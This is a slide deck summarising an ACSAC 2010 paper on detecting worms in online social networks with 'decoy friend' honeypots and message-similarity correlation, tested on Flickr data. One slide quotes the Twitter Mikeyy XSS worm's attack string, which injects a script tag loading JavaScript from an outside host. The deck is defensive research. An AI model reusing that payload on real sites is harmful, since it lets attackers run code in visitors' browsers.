220 likes | 384 Views
Toward Worm Detection in Online Social Networks. Wei Xu, Fangfang Zhang, and Sencun Zhu ACSAC 2010. OUTLINE. Introduction Related Work System Design Evaluation Limitation and Discussion Conclusion. Introduction - Worm. Worm Scanning Attack string XSS Worm XSS Vulnerability
E N D
Toward Worm Detection in Online Social Networks Wei Xu, Fangfang Zhang, and Sencun Zhu ACSAC 2010
OUTLINE • Introduction • Related Work • System Design • Evaluation • Limitation and Discussion • Conclusion
Introduction - Worm • Worm • Scanning • Attack string • XSS Worm • XSS Vulnerability • OSN(Online Social Networking) Worm • Messages • Url link
Twitter XSS Worm • var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
Related Work • Worm detection, early warning and response based on local victim information. ACSAC(2004) • And many Worm detection approach… • Rely on scanning traffic/detailed infection procedure • Fast detection and suppression of instant messaging malware in enterprise-like networks. ACSAC(2007) • HoneyIM
Idea • OSN • High clustering property • Monitor the “popular” user • “Decoy friend” • Idea of honeypot • Add into a normal user’s friends list
System Design • Like lightweight NIDS
System Design • Configuration module • Social graph • Evidence collecting module • Gathers suspicious worm propagation evidence • Worm detection module • Identifies and reports worm • Communication module • Just for communicate
Evidence collecting module • Decoy friend • As a low-interactive honeypot • Receive worm evidence • Questions of decoy friend • Information leak • User’s reluctance • How to collect only suspicious worm evidence
Configuration module • Selecting normal users and assigning decoy friends to these users • Two decoy friends for each user • Selecting normal users • Limiting the number of decoy friends • Preserving the detection effectiveness
Configuration module • Question: A directed graph G = (V,E) user connection between two users • Extended dominating set problem • Minimum vertex set • Or exists a path form to where and the length of this path is at most hops.
Configuration module • Make it simple • Sets r = 2 • Not necessary to cover the entire social graph • Power law distribution • 20% of users have no connections • Maximum Coverage Problem • Given a social graph G=(V,E) and a number k, choose a set of vertices with size of at most k such that the number of other vertices that are covered by this set with coverage redius r=2 reaches the maximum
Worm detection module • Def: suspicious propagation evidence list(SPEL) • {decoy friend ID, receiving time, content} • Event: get any SPEL • Keep it for a short period of time • Step1:Local Correlation • Compare two decoy friends(from same user) • Step2:Network Correlation • Compare all saved SPEL
Worm detection module • Compare SPEL • If a similarity over 90% → Alert • Similarity • Edit distance of content in SPEL
Evaluation • Flickr • 1,846,198 users • 22,613,981 friend links • 1.Test Koobface worm and Mikeyy worm • 2.Different worm behavior • 3.Different size of selected users set(with decoy friends)
Evaluation1 • Koobface Different messages All friends • Mikeyy Same messages All friends Maximum infection 2420 (0.13%)
Evaluation2 • Infection Number versus Different Percentages of Friends lists
Evaluation3 • 2937.85(0.16%)
Limitation&Discussion • False positive? • Outbreak of a large-scale event • A posted link in a suspicious message is pointed to well-known website – OK • Otherwise – rare case, manual checking? • Time delay • Keep messages longer
Conclusion • A new problem – OSN worm • Monitor a few hundreds of users to detect OSN worm • Effectively detect OSN worm (0.13%)